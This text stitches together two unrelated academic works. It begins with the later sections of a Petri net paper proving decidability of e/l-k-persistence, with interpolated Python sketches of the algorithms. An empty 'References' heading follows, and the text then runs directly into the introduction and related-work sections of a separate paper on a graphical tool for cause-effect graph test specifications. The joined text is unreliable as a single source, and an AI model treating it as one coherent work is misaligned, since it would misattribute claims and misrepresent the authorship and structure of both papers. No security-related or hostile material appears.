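The componentwise construction of \( \text{minE}_{a,b} \) is a one-liner. The sketch below takes the maximum of the two preconditions per place, which coincides with the paper's 0/1 formula on nets with unit arc weights (extending it to larger weights by `max` is our assumption):

```python
def min_mutual_enabling(pre_a, pre_b):
    """Minimum marking enabling both a and b: per place, the larger
    of the two preconditions (equals the paper's formula for 0/1 arcs)."""
    return tuple(max(p, q) for p, q in zip(pre_a, pre_b))

def in_E_ab(M, min_e):
    """M lies in E_{a,b} = minE_{a,b} + N^P iff M >= minE componentwise."""
    return all(m >= e for m, e in zip(M, min_e))
```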
- **Mutual Enabledness Reachability Problem**
Let us formulate an auxiliary problem:
**Mutual Enabledness Reachability Problem**
**Instance:** \( P/t \)-net \( S = (N, M_0) \), actions \( a, b \in T \).
**Question:** Is there a marking \( M \) such that \( M \in E_{a,b} \) and \( M \in [M_0] \)? (Is there a reachable marking \( M \) such that actions \( a \) and \( b \) are both enabled in \( M \)?)
**Theorem 5.** The Mutual Enabledness Reachability Problem is decidable.
**Proof.** Let \( M = \text{minE}_{a,b} \). We build a coverability graph for the p/t-net \( S \) and check whether it contains a vertex corresponding to an \( \omega \)-marking \( M' \) that covers \( M \). If so, then actions \( a \) and \( b \) are simultaneously enabled in some reachable marking of the net \( S \). Otherwise, those transitions are never enabled at the same time.
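The covering test at the heart of this proof compares an \( \omega \)-marking against an ordinary marking componentwise; encoding \( \omega \) as floating-point infinity is our choice for illustration (building the coverability graph itself is not shown):

```python
OMEGA = float('inf')  # our encoding of the omega symbol

def covers(omega_marking, M):
    """Does an omega-marking from the coverability graph cover M?
    An omega component dominates every finite token count."""
    return all(x >= m for x, m in zip(omega_marking, M))
```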
Let \( \text{Min}[M_0] \) be the set of minimal (wrt \( \leq \)) reachable markings of the net \( S \). As members of \( \text{Min}[M_0] \) are incomparable, the set \( \text{Min}[M_0] \) is finite, by Lemma 4.
Let us denote by \( \text{RE}_{a,b} \) the set of all reachable markings of the net \( S \) enabling actions \( a \) and \( b \) simultaneously: \( \text{RE}_{a,b} = \{ M \in [M_0] \mid Ma \land Mb \} = E_{a,b} \cap [M_0] \).
Let \( \text{Min}(\text{RE}_{a,b}) \) be a set of all minimal reachable markings of the net \( S \) enabling action \( a \) and \( b \) simultaneously.
- **Results of Valk and Jantzen**
In order to construct the set \( \text{Min}(\text{RE}_{a,b}) \), we make use of the theory of residue sets of Valk/Jantzen [18].
**Definition 12 (Valk/Jantzen [18]).** A subset \( X \subseteq \mathbb{N}^k \) has property \( \text{RES} \) if and only if the problem "Does \( \downarrow v \) intersect \( X \)?" is decidable for any \( \omega \)-vector \( v \in \mathbb{N}_\omega^k \).
**Theorem 6 (Valk/Jantzen [18]).** Let \( X \subseteq \mathbb{N}^k \) be a right-closed set. Then the set \( \text{Min}(X) \) is effectively computable if and only if \( X \) has property \( \text{RES} \).
• Set Reachability Problem
We also use the fact of decidability of the Set Reachability Problem for rational convex sets (Def. 5.7), proved in [2].
Set Reachability Problem
Instance: P/t-net \( S = (N, M_0) \) and a set \( X \subseteq \mathbb{N}^P \).
Question: Is there a marking \( M \in X \), reachable in \( S \)?
Theorem 7. The Set Reachability Problem is decidable for rational convex sets in p/t-nets.
The Set Reachability Problem is a generalization of the classical Marking Reachability Problem. The proof uses decidability of the Reachability Problem.
• Minimal reachable markings enabling two actions simultaneously
Now we are ready to prove:
Proposition 2. The set \( \text{Min}(RE_{a,b}) \) can be effectively constructed for a given net \( S = (P,T,F,M_0) \).
Proof. Let us take the right closure \( RE_{a,b} \uparrow \) of the set \( RE_{a,b} \).
Note that \( \text{Min}(RE_{a,b}) = \text{Min}(RE_{a,b} \uparrow) \). To show that the set of minimal elements of the set \( RE_{a,b} \uparrow \) is effectively computable, it is enough to demonstrate that the set \( RE_{a,b} \uparrow \) has the property RES (i.e. for any \( \omega \)-vector \( v \in \mathbb{N}^P \) the problem "\( (\downarrow v \cap RE_{a,b} \uparrow \neq \emptyset) \)" is decidable) and apply Theorem 6.
Let \( X = \downarrow v \cap E_{a,b} \), where \( E_{a,b} = \min E_{a,b} + \mathbb{N}^P \). Let us notice, that \( \downarrow v \) is a convex set, hence rational (Proposition 1). The set \( E_{a,b} \) is also a rational convex set. As an intersection of convex rational sets, the set \( X \) is convex and rational (Theorem 1) as well.
Hence, putting into work decidability of the Set Reachability Problem for rational convex sets (Theorem 7), we decide whether any marking from the set \( X \) is reachable in \( S \). Therefore, we can decide whether the set \( X' = \downarrow v \cap RE_{a,b} \) is nonempty. (It is the case when at least one marking from the set \( X \) is reachable in \( S \).) Let us notice that \( \downarrow v \cap RE_{a,b} \uparrow \) is nonempty if and only if the set \( X' \) is nonempty. That is why the set \( RE_{a,b} \uparrow \) has the property RES, and consequently the set \( \text{Min}(RE_{a,b}) \) is effectively computable by Theorem 6.
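The first half of the intersection test in this proof — does \( \downarrow v \) intersect \( E_{a,b} = \text{minE}_{a,b} + \mathbb{N}^P \)? — reduces to a componentwise comparison, since the smallest member of a right-closed set must itself lie below \( v \). (The reachability half, deciding whether \( X' \) is nonempty, needs the Set Reachability machinery and is not shown; encoding \( \omega \) as infinity is our choice.)

```python
OMEGA = float('inf')  # our encoding of the omega symbol in omega-vectors

def down_v_meets_E(v, min_e):
    """Does the downward closure of the omega-vector v intersect
    minE + N^P?  True iff minE <= v componentwise."""
    return all(e <= x for e, x in zip(min_e, v))
```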
Example 6. The set of all minimal reachable markings of the net depicted in Figure 9 enabling action \( a \) and \( b \) simultaneously, is \( \text{Min}(RE_{a,b}) = \{[1,1,1],[2,0,1]\} \).
Proposition 3. If there exists a marking \( M \in RE_{a,b} \) such that the execution of an action \( a \) in \( M \) pushes the execution of an action \( b \) away for more than \( k \) steps (for some \( k \in \mathbb{N} \)), then there exists some minimal marking \( M' \in \text{Min}(RE_{a,b}) \) such that the execution of an action \( a \) in \( M' \) pushes the execution of an action \( b \) away for more than \( k \) steps, too.
Proof. Let $M$ be a marking, such that the execution of an action $a$ in $M$ pushes the execution of an action $b$ away for more than $k$ steps (for some $k \in \mathbb{N}$). Let $M' \in \text{Min} (\text{RE}_{a,b})$ such that $M' \preceq M$. Such a marking has to exist. Suppose that there is a string $w \in T^*$, $|w| \leq k$ such that $M'awb$. Then obviously also $Mawb$ (from the monotonicity property - Fact 2). We obtain a contradiction. Hence, the execution of an action $a$ in $M'$ postpones the execution of $b$ for more than $k$ steps.
**EL-k Transition Persistence Problem and EL-k Net Persistence Problem**
Now, we are ready to introduce the following problem:
**EL-k Transition Persistence Problem**
*Instance:* P/t-net $S = (N, M_0)$, ordered pair $(a, b) \in T \times T, b \neq a$, $k \in \mathbb{N}$.
*Question:* Is there a reachable marking $M \in [M_0]$ such that $Ma \land Mb \land \neg (\exists w \in T^*) |w| \leq k \land Mawb$? (Does $a$ postpone $b$ for more than $k$ steps?)
**Theorem 8.** The EL-k Transition Persistence Problem is decidable.
*Proof.* We introduce an algorithm of deciding if an action $a$ pushes the execution of an action $b$ away for more than $k$ steps in some reachable marking $M$.
1. We check whether both actions $a$ and $b$ are enabled in some reachable marking (using decidability of Mutual Enabledness Reachability Problem).
(a) If not, we answer NO.
(b) Otherwise:
i. We build the set $\text{Min} (\text{RE}_{a,b})$. This set can be effectively computed by Proposition 2 using Valk/Jantzen algorithm.
ii. For all markings \( M_1 \in \text{Min}(\text{RE}_{a,b}) \):
\[
M_2 := M_1 a.
\]
We build the initial part of depth \( k+1 \) (the \( (k+1) \)-component) of the reachability tree of \( (N, M_2) \). If, for some \( M_1 \), this component contains no arc labelled by \( b \), we answer YES; if every component contains such an arc, we answer NO.
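Assuming the set \( \text{Min}(\text{RE}_{a,b}) \) has already been computed (step i, via the Valk/Jantzen machinery, not shown here), step ii can be sketched as follows; the dict-based net encoding is our own illustration:

```python
def a_postpones_b_beyond_k(net, min_RE_ab, a, b, k):
    """Theorem 8, step ii: True iff for some minimal marking M1 the
    (k+1)-component of the reachability tree of (N, M1 a) contains
    no arc labelled b, i.e. a pushes b away for more than k steps."""
    def enabled(M, pre):
        return all(m >= p for m, p in zip(M, pre))
    def fire(M, pre, post):
        return tuple(m - p + q for m, p, q in zip(M, pre, post))
    pre_a, post_a = net[a]
    for M1 in min_RE_ab:
        frontier, b_fires = [fire(M1, pre_a, post_a)], False
        for _ in range(k + 1):
            nxt = []
            for m in frontier:
                for t, (pre, post) in net.items():
                    if enabled(m, pre):
                        if t == b:
                            b_fires = True
                        nxt.append(fire(m, pre, post))
            frontier = nxt
        if not b_fires:
            return True  # this M1 witnesses the answer YES
    return False
```

On an invented two-place net where a moves the token away from b's input place and c returns it, with \( \text{Min}(\text{RE}_{a,b}) = \{(1,0)\} \), the procedure answers YES for \( k = 0 \) and NO for \( k = 1 \), matching the pattern of Example 7.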
And now the proof of decidability of the EL-k Net Persistence Problem is ready.
**Theorem 9.** The EL-k Net Persistence Problem is decidable (for any \( k \in \mathbb{N} \)).
**Proof.** \( S \) is e/l-\( k \)-persistent iff the algorithm solving the EL-k Transition Persistence Problem answers NO for all ordered pairs \( (a, b) \in T \times T, a \neq b \).

**Example 7.** Let us check whether the action \( a \) of the net \( S \) of Figure 4 postpones the action \( b \) for more than 1 step.
Actions \( a \) and \( b \) are both enabled in the initial marking.
The set \( \text{Min}(\text{RE}_{a,b}) \) consists of a single marking \( M_1 = [1,0] \). We take \( M_2 = M_1 a = [0,1] \). We build a 2-component of the reachability tree of the net \( (S, M_2) \).
The tree is depicted in Figure 10. The tree has an edge labeled by \( b \) so the action \( a \) does not postpone the action \( b \) for more than 1 step.
**EL-k Transition Persistence Problem - an alternative approach**
In order to show decidability of the EL-k Net Persistence Problem we can use the technique used for proving decidability of LL Net Persistence Problem and EL Net Persistence Problem, presented in [2].
Again, we deal with the EL-k Transition Persistence Problem, crucial for the proof. We show an alternative proof of decidability of that problem.
**EL-k Transition Persistence Problem**
**Instance:** P/t-net \( S = (N, M_0) \), ordered pair \( (a, b) \in T \times T, b \neq a, k \in \mathbb{N} \).
**Question:** Is there a reachable marking \( M \in [M_0] \) such that
\[
Ma \land Mb \land \neg(\exists w \in T^*) |w| \leq k \land Mawb
\]
Let us define, in order to reformulate the problem above, the following sets of markings:
$E_a = \{ M \in \mathbb{N}^P \mid Ma \}$ - markings enabling $a$
$E_b = \{ M \in \mathbb{N}^P \mid Mb \}$ - markings enabling $b$
$E_{a(k)b} = \{ M \in \mathbb{N}^P \mid (\exists w \in T^*)\, |w| \leq k \land Mawb \}$ - markings enabling $a$ such that, after the execution of $a$, the action $b$ is potentially enabled after at most $k$ steps.
Now we can reformulate the question of the problem above:
**Question**: Is the set $E_a \cap E_b \cap (\mathbb{N}^P \setminus E_{a(k)b})$ reachable in $(N, M_0)$?
Let us look again at Theorem 9.
**Theorem 9** The EL-$k$ Net Persistence Problem is decidable (for any $k \in \mathbb{N}$).
**Proof.** First note that, by the monotonicity property (Fact 2), the set $E_a \cap E_b \cap (\mathbb{N}^P \setminus E_{a(k)b})$ is convex, thus rational (by Proposition 1). The rational expressions for $E_a$ and $E_b$ are $E_a = {}^\bullet a + \mathbb{N}^P$ and $E_b = {}^\bullet b + \mathbb{N}^P$. Clearly, the set $E_{a(k)b}$ is right-closed, by the monotonicity property. We shall prove that it has the property RES. Namely, $\downarrow v$ (for $v \in \mathbb{N}_\omega^P$) intersects $E_{a(k)b}$ if and only if ${}^\bullet a \leq v$ (i.e. $a$ is enabled in $v$) and the reachability tree of the net $(N, v')$, limited to its first $k+1$ levels, contains an arc labelled by $b$, where $v'$ is the $\omega$-marking obtained from $v$ by the execution of $a$. This is obviously decidable. Hence, the set $E_{a(k)b}$ has the property RES, thus (by Theorem 6) the set $\text{Min}(E_{a(k)b})$ is effectively computable. As $E_{a(k)b}$ is right-closed, we get a rational expression for it: $E_{a(k)b} = \text{Min}(E_{a(k)b}) + \mathbb{N}^P$. Finally, using Theorem 10 of Ginsburg/Spanier [8], we compute a rational expression for $E_a \cap E_b \cap (\mathbb{N}^P \setminus E_{a(k)b})$, and decidability of the Set Reachability Problem for rational convex sets (Theorem 7) yields decidability of the problem.
### 3.3 Collapsing of the hierarchy of $e/l$-persistence
#### k-enabledness
Let us recall the well-known fact, that follows from the Dickson’s Lemma (Lemma 1).
**Fact 6** Every infinite sequence of markings contains an infinite increasing (not necessarily strictly) subsequence of markings.
Recall also that p/t-nets have the monotonicity property - Fact 2.
Let us define the notion of k-enabledness.
**Definition 13 (k-enabledness).** Let $S = (P, T, F, M_0)$ be a p/t-net, let $M$ be a marking. For $k \in \mathbb{N}$ we say that the action $a \in T$ is $k$-enabled in the marking $M$ if and only if $\exists w \in T^*$, such that $|w| \leq k \land Mwa$.
Now, we can show:
**Lemma 2.** Let $S$ be a p/t-net. For an arbitrary $a \in T$ there exists a natural number $k_a \in \mathbb{N}$, such that in every marking $M$ the transition $a$ is $k_a$-enabled or it is dead.
**Proof.** Suppose that the lemma does not hold for some action $a \in T$. Then for each $k \in \mathbb{N}$ there is a marking $M$ such that $a$ is not $k$-enabled in $M$ but not dead, i.e. $a$ is $k'$-enabled for some $k' > k$. Thus, there exist an infinite set of markings $M_1, M_2, \ldots$ and integers $k_1 < k_2 < \ldots$, such that the action $a$ is not dead in each marking $M_i$ and not $k_i$-enabled in $M_i$, for all $i = 1, 2, \ldots$. Let us choose (by Fact 6) an infinite increasing subsequence of markings $M_{i_1} \leq M_{i_2} \leq \ldots$. Since the action $a$ is not dead in $M_{i_1}$, it is $k$-enabled in $M_{i_1}$, for some $k \in \mathbb{N}$. As the strictly increasing sequence $k_1 < k_2 < \ldots$ is infinite, $k < k_{i_j}$ for some $j$. By the monotonicity property (Fact 2), the action $a$ is $k$-enabled, hence $k_{i_j}$-enabled, in the marking $M_{i_j}$. Contradiction.
**Remark:** Note that the proof of Lemma 2 is purely existential, it does not present any algorithm for finding $k$.
Now, we are ready to formulate the main theorem of the section:
**Theorem 10.** If a p/t-net is e/l-persistent, then it is e/l-$k$-persistent for some $k \in \mathbb{N}$.
In words: whenever an action is disabled by another one, it is pushed away for not more than $k$ steps.
**Proof.** If the net is e/l-persistent, then no action kills another enabled one. From the Lemma 2 we know, that if an action $a \in T$ is not dead then it is $k_a$-enabled. Let us take $K = \max\{k_a | a \in T\}$, for the numbers $k_a$ from the Lemma 2. One can see that every action in the net that is not dead, is $K$-enabled. Thus, the execution of any action may postpone the execution of an action $a$ for at most $K$ steps. So we have the implication: if a p/t-net is e/l-persistent, then it is e/l-$K$-persistent, for $K$ defined above.
**Remark:** As the proof of Lemma 2 explicitly uses the monotonicity property of p/t-nets, the Theorem 10 holds only for nets satisfying this property. The following example shows that Theorem 10 does not hold for nets without the monotonicity property (for instance, inhibitor nets).
**Example 8.** Let us look at the example of Fig. 11. We can see an inhibitor net and its computation such that for every $k \in \mathbb{N}$ one can push an action away for a distance greater than $k$ steps.
This net is live, hence it is e/l-persistent, but it is not e/l-$k$-persistent for any $k \in \mathbb{N}$.
In the infinite computation $achdacebeddaebebebeddadaeeeb\ldots$ the first $a$ pushes $b$ away for 1 step, the second - for 2 steps and every $k$-th $a$ - for $k$ steps.
Fig. 11. An inhibitor net for Ex.8
- Collapsing of the hierarchy - an effective proof
Finally, let us recall other decision results of [2]:
**Transitions Persistence Problems**
*Instance:* P/t-net S = (N, M₀), and transitions a, b ∈ T, a ≠ b.
*Questions (informally):*
EE-Persistence Problem: Does a disable an enabled b?
LL-Persistence Problem: Does a kill a live b?
EL-Persistence Problem: Does a kill an enabled b?
From [2] we know that the problems are decidable.
**Theorem 11.** For a given p/t-net $S = (N, M_0)$ and a pair of transitions $a, b \in T$ one can calculate the minimum number $k_{a,b} \in \mathbb{N}$ such that $a$ postpones an enabled $b$ for at most $k_{a,b}$ steps (if such a number exists).
**Proof.**
- We check whether both actions $a$ and $b$ are enabled in some reachable marking (using decidability of the Mutual Enabledness Reachability Problem). If not, $k_{a,b}$ does not exist (actions $a$ and $b$ are never enabled at the same time).
Otherwise:
- We ask whether a kills an enabled b (EL-Persistence Problem).
If YES then $k_{a,b}$ does not exist ($a$ kills $b$)
else:
* We compute the set $\text{Min}(RE_{a,b})$. This set can be effectively computed by Proposition 2 using the Valk/Jantzen algorithm.
* We build the initial part of the reachability tree of the net $S$ until, for every $M \in \text{Min}(RE_{a,b})$, some (possibly empty) path leads from $M$ to a vertex $M'$ such that $M'b$. Such a part of the tree is finite: since $a$ does not kill $b$, for every $M \in \text{Min}(RE_{a,b})$ a finite path leads from $M$ to a vertex $M'$ with $M'b$. The maximum length of such paths is the desired number $k_{a,b}$.
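The computation of \( k_{a,b} \) can be sketched as a shortest-path search from each minimal marking, after firing \( a \), to a marking enabling \( b \); the depth cutoff and dict-based net encoding are our illustrative additions (the paper's procedure terminates because \( a \) is already known not to kill \( b \)):

```python
from collections import deque

def min_postpone_bound(net, min_RE_ab, a, b, max_depth=1000):
    """Smallest k such that a postpones an enabled b for at most k
    steps: the longest, over M1 in Min(RE_{a,b}), of the shortest
    firing sequences from M1 a to a marking enabling b."""
    def enabled(M, pre):
        return all(m >= p for m, p in zip(M, pre))
    def fire(M, pre, post):
        return tuple(m - p + q for m, p, q in zip(M, pre, post))
    pre_a, post_a = net[a]
    worst = 0
    for M1 in min_RE_ab:
        start = fire(M1, pre_a, post_a)
        queue, seen = deque([(start, 0)]), {start}
        while queue:
            m, d = queue.popleft()
            if enabled(m, net[b][0]):
                worst = max(worst, d)  # b reachable after d steps
                break
            if d < max_depth:
                for t, (pre, post) in net.items():
                    if enabled(m, pre):
                        m2 = fire(m, pre, post)
                        if m2 not in seen:
                            seen.add(m2)
                            queue.append((m2, d + 1))
    return worst
```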
**Theorem 12.** If a p/t-net S = (N, M₀) is e/l-persistent, then it is e/l-k-persistent for some k ∈ N and such a k can be effectively computed.
Proof. For every pair \((a, b)\) of transitions we find \(k_{a,b}\) defined above. The number we are looking for is \(k = \max(k_{a,b} : a, b \in T)\).
We established that an action cannot postpone another action (without killing it) indefinitely (Theorem 10). We proved that if a p/t-net is e/l-persistent, then it is e/l-k-persistent for some \(k \in \mathbb{N}\). We showed that such a \(k\) exists and presented an algorithm for finding it.
4 Conclusions
It is shown in [1] that if we change the firing rule in the following way: only e/e-persistent computations are permitted, then we get a new class of nets (we call them nonviolence nets) which are computationally equivalent to Turing machines. We plan to investigate net classes, with firing rules changed (only e/l-k-persistent computations are allowed) and answer the question:
**Question 1:**
What is the computational power of nets created this way?
In this paper, we have investigated the hierarchy of persistence in p/t-nets. We would like to study the hierarchy of e/l-k-persistence in some extensions of p/t-nets, for instance nets with read arcs and reset nets. All results of the paper hold for nets with read arcs [11], as they can be simulated by classical Petri nets with self-loops with the same reachability set (but with distinct step semantics). On the contrary, only Lemma 2 and Theorem 10 hold (with the same proof) for other extended Petri nets possessing the monotonicity property (e.g. reset, double, transfer nets), but the results supported with the fact of decidability of the Reachability Problem cannot be applied to those nets, because of undecidability of the Reachability Problem in them (see [7]).
References
New Graphical Software Tool for Creating Cause-Effect Graph Specifications
Ehlimana Krupalija, Šeila Bećirović, Irfan Prazina, Emir Cogo, and Ingmar Bešić
Abstract — Cause-effect graphing is a commonly used black-box technique with many applications in practice. It is important to be able to create accurate cause-effect graph specifications from system requirements before converting them to test case tables used for black-box testing. In this paper, a new graphical software tool for creating cause-effect graph specifications is presented. The tool uses standardized graphical notation for describing different types of nodes, logical relations and constraints, resulting in a visual representation of the desired cause-effect graph which can be exported for later usage and imported in the tool. The purpose of this work is to make the cause-effect graph specification process easier for users in order to solve some of the problems which arise due to the insufficient amount of understanding of cause-effect graph elements. The proposed tool was successfully used for creating cause-effect graph specifications for small, medium and large graphs. It was also successfully used for performing different types of tasks by users without any prior knowledge of the functionalities of the tool, indicating that the tool is easy to use, helpful and intuitive. The results indicate that the usage of standardized notation is easier to understand than non-standardized approaches from other tools.
Index terms — software quality, black-box testing, cause-effect graph, graphical software tool.
I. INTRODUCTION
Cause-effect graphing (CEG) was introduced as a black-box testing technique in 1970 as a new way of generating test cases for a given software product functionality [1]. It was later adopted as a standard black-box testing method in works such as [2], [3], [4] and [5]. Cause-effect graph specifications contain three different types of elements: nodes (causes, intermediates and effects), logical (Boolean) relations and dependency constraints. After creating the cause-effect graph specification from system requirements, different algorithms based on back-propagation of effect values through the graph such as [4], [6] and [7] can be used for deriving test case tables. These test case tables are then used for black-box testing the desired system.
The main difficulty in the usage of cause-effect graphs arises due to the large dimensionality of test cases. Each node can be in one of two states – active or inactive, which is why the total number of test cases is $2^{\text{number of causes}}$. It is very important to correctly specify all logical relations and constraints between causes and effects of the graph before generating the test case table by using the available algorithms. Usage of constraints reduces the feasible test case subset size, making the test case selection process easier and less costly [8]. Unfortunately, the definition of the most commonly used back-propagation algorithm for deriving test case tables from [4] contains many inconsistencies. Additionally, different types of constraints are often misinterpreted by users, which is why their usage is often omitted (e.g. MSK constraints in [9] and [10]). All of these problems are pointed out and explained in detail in [11]. Test-case-description-related problems (e.g. incomprehensible, abstract and poorly documented test cases) also pose a critical problem [12], which is why it is very important to correctly derive cause-effect graph element descriptions from system requirements. The lack of verification of the conformance of the cause-effect graph with the specification of the desired system leads to many problems with test case derivation from cause-effect graph specifications. For this reason, the usage of machine learning methods [13] and natural language processing algorithms [14] has recently been proposed for automatically converting system requirements to cause-effect graph specifications.
Another factor which increases the amount of errors in the cause-effect graph specification process is the misuse of graphical notation for representing cause-effect graph elements. Different types of notation are present in the available cause-effect graphing works and the lack of standardization between different approaches makes this process more error-prone. Some non-standard approaches regarding the notation used for depicting different logical relations are similar to the standardized notation such as [15], whereas in other cases such as [16] the notation is very different and may be hard to understand. Additionally, omitting intermediate nodes can lead to specifications which do not conform to system requirements or result in incorrect test case tables, as noted in [11]. This problem is also addressed in [14], which accentuates the importance of the conformance of cause-effect graph specifications and formal system requirements.
A limited number of software tools for aiding the process of creating cause-effect graph specifications is available. Most of these tools are not open-source and are not available for free usage. Only one available tool [17] contains graphical elements, whereas other tools such as [18] and [7] focus on the application of different CEG algorithms for deriving test case tables from cause-effect graph specifications provided by the user. The expected contributions of this work include:
- Introduction of a new software tool which uses standardized graphical notation for creating cause-effect graph specifications. The tool can also be used for exporting the specifications to .txt files and importing these files for later reuse and modification. Usage of this tool can help in reducing the time for generating black-box tests for a given system based on system requirements and offer output that conforms to the standard accepted notation present in the available literature.
- Analysis of the scalability of the graphical-tool-based approach for the specification of cause-effect graphs. Using a variety of small, medium and large graphs presented in related work, the proposed tool was evaluated in order to confirm that it can be successfully used for creating both simple and complex cause-effect graph specifications.
- The comparison of available software tools to the newly introduced graphical software tool in terms of usage of graphical elements and usability. Usability of the newly proposed tool and its comparison to other available tools were evaluated by conducting surveys for user-based evaluation.
This work is structured as follows. In section II, cause-effect graphs are introduced and their main elements are explained in detail. Background and related work are also discussed in this section. In section III, the graphical user interface and functionalities of the proposed software tool are explained. The evaluation of the graphical tool by using different examples from the relevant literature and other available tools is summarized in section IV. Two surveys were conducted for determining the usability of the new software tool and for comparison with other existing approaches. Section V contains the explanation of internal and external threats to validity of the conducted study, as well as its limitations. In section VI, the overall analysis of the software tool is conducted with its comparison to earlier approaches. Recommendations for further research and possible future enhancements of the tool are also given in this section.
II. PRELIMINARIES AND RELATED WORK
This section contains the necessary preliminaries for understanding the cause-effect graph specification process. In Section II.A. all types of cause-effect graph elements are defined: different types of nodes, logical relations and dependency constraints, which will be used in the proposed graphical software tool. Section II.B. contains the explanation of all related work in the field of research, including the wide usage of cause-effect graphs for different applications, available types of graphical notation and a systematic review of existing CEG software tools.
A. Cause-effect Graph Specification Elements
Cause-effect graph specification and its elements are defined and explained in many works such as [1], [2] and [4]. Every cause-effect graph contains three different types of elements – graph nodes, logical relations and dependency constraints. All defined graph nodes, regardless of their type, can be in one of two states – active (1) or inactive (0). Cause-effect graphs can contain three different types of nodes:
1) Causes, which are used to describe different variables or events which result in the activation of effects in the system. Cause nodes are always placed on the left side of the graph. Causes are denoted as \( C_i \) (where \( i > 0 \) represents the number of the node). Every cause-effect graph must have at least one cause node.
2) Effects, which are used to describe different variables or events which are triggered by the causes of the system. Effect nodes are always placed on the right side of the graph. Effects are denoted as \( E_i \) (where \( i > 0 \) represents the number of the effect node). Every cause-effect graph must have at least one effect node.
3) Intermediates, which are used as helpers for capturing different logical relations between cause nodes. The purpose of these nodes is to reuse the effects of logical relations as causes for other logical relations. Intermediate nodes are always placed between the causes and effects of the graph. Intermediates are denoted as \( I_i \) (where \( i > 0 \) represents the number of the intermediate node). Usage of intermediates is optional.
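The three node types above can be captured by a minimal data model. The sketch below is illustrative only (the class and field names are assumptions, not the actual code of the proposed tool):

```python
# Minimal illustrative data model for cause-effect graph nodes.
# Names ("Node", "kind", "number") are assumptions for this sketch.
from dataclasses import dataclass

@dataclass(frozen=True)
class Node:
    kind: str    # "C" (cause), "I" (intermediate) or "E" (effect)
    number: int  # i > 0, per the numbering convention C_i / I_i / E_i

    @property
    def label(self) -> str:
        return f"{self.kind}{self.number}"

# Labels follow the convention described above:
print(Node("C", 1).label, Node("I", 1).label, Node("E", 2).label)  # C1 I1 E2
```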
Six different logical relations can be defined between graph causes, intermediates and effects. Due to the initially intended purpose of cause-effect graphs for testing hardware logical circuits in [1], truth tables of logical relations are very similar to those of logical gates. In addition to the four standard logical relations: DIR (direct), NOT (negation), AND (conjunction) and OR (disjunction), two additional relations (which are omitted in some works such as [4] and [19]) can be used: NAND (Sheffer stroke) and NOR (Peirce arrow). The direct and negation logical relations are unary, meaning they have exactly one cause and one effect node, whereas all other logical relations are \( n \)-ary, meaning they have \( n > 1 \) causes and one effect node. The truth table for all six logical relations is shown in Table I, where nodes (labeled as \( N_1 \) and \( N_2 \)) represent causes and the operation result represents the resulting effect value (a value of 0 means that the effect is not activated and vice versa). Only \( N_1 \) values are used for determining the results of the direct and negation relations, which are unary.
Five different dependency constraints can be defined between graph causes or effects: EXC (exclusion), INC (inclusion), REQ (required), MSK (masking) and EXC Δ INC (one and only one – exclusion inclusion). All constraints except for MSK are defined on causes, whereas the MSK constraint is
defined on effects. Intermediates cannot be used in constraints. EXC, INC and EXC Δ INC constraints are n-ary, meaning they have \( n > 1 \) causes, whereas REQ and MSK constraints are binary, meaning they are defined on exactly two nodes. The truth table for all five constraints is shown in Table II, where depending on the type of the constraint, nodes \( N_1 \) and \( N_2 \) can either represent causes or effects, whereas the operation result represents the resulting test case feasibility (value of 0 means that the test case is not feasible and vice versa).
TABLE I. TRUTH TABLE FOR ALL SIX LOGICAL RELATIONS
\[
\begin{array}{|c|c|c|c|c|c|c|c|}
\hline
\multicolumn{2}{|c|}{\text{Cause values}} & \multicolumn{6}{c|}{\text{Resulting effect values}} \\
\hline
N_1 & N_2 & \text{DIR} & \text{NOT} & \text{AND} & \text{OR} & \text{NAND} & \text{NOR} \\
\hline
0 & 0 & 0 & 1 & 0 & 0 & 1 & 1 \\
0 & 1 & 0 & 1 & 0 & 1 & 1 & 0 \\
1 & 0 & 1 & 0 & 0 & 1 & 1 & 0 \\
1 & 1 & 1 & 0 & 1 & 1 & 0 & 0 \\
\hline
\end{array}
\]
TABLE II. TRUTH TABLE FOR ALL FIVE DEPENDENCY CONSTRAINTS
\[
\begin{array}{|c|c|c|c|c|c|c|}
\hline
\multicolumn{2}{|c|}{\text{Node values}} & \multicolumn{5}{c|}{\text{Resulting test case feasibility}} \\
\hline
N_1 & N_2 & \text{EXC} & \text{INC} & \text{REQ} & \text{MSK} & \text{EXC}\ \Delta\ \text{INC} \\
\hline
0 & 0 & 1 & 0 & 1 & 1 & 0 \\
0 & 1 & 1 & 1 & 1 & 1 & 1 \\
1 & 0 & 1 & 1 & 0 & 1 & 1 \\
1 & 1 & 0 & 1 & 1 & 0 & 0 \\
\hline
\end{array}
\]
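The two truth tables can be expressed directly in code. The sketch below assumes the standard semantics described above (DIR and NOT use only the first node; REQ is read as \( N_1 \) requiring \( N_2 \); MSK as \( N_1 \) forcing \( N_2 \) inactive); the function names are illustrative:

```python
def relation(op, n1, n2=0):
    """Effect value (0/1) of a logical relation; DIR and NOT use only n1."""
    if op == "DIR":
        return n1
    if op == "NOT":
        return 1 - n1
    if op == "AND":
        return n1 & n2
    if op == "OR":
        return n1 | n2
    if op == "NAND":
        return 1 - (n1 & n2)
    if op == "NOR":
        return 1 - (n1 | n2)
    raise ValueError(op)

def feasible(constraint, n1, n2):
    """Test case feasibility (1 = feasible) under a dependency constraint."""
    if constraint == "EXC":      # at most one node active
        return 0 if (n1, n2) == (1, 1) else 1
    if constraint == "INC":      # at least one node active
        return 0 if (n1, n2) == (0, 0) else 1
    if constraint == "REQ":      # n1 active requires n2 active
        return 0 if (n1, n2) == (1, 0) else 1
    if constraint == "MSK":      # n1 active forces n2 inactive
        return 0 if (n1, n2) == (1, 1) else 1
    if constraint == "EXC_INC":  # one and only one node active
        return 1 if n1 != n2 else 0
    raise ValueError(constraint)

print(relation("NAND", 1, 1), feasible("EXC", 1, 1))  # 0 0
```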
B. Related Work
Cause-effect graphs have been applied in many areas, such as telecommunication distributed systems [20], quantum programming [10], knowledge assessment [21], the automatic college placement process [22] and high-speed safety-critical railway systems [9]. Due to their similarity to digital circuits [4], cause-effect graphs can be applied to a variety of problems that require logical relation modeling, in order to determine which test cases are feasible so the overall number of tests can be reduced. Cause-effect graphs have also been combined with other techniques, such as pairwise testing [23], UML model transformations [24] [25] and Boolean differentiation [26] [7].
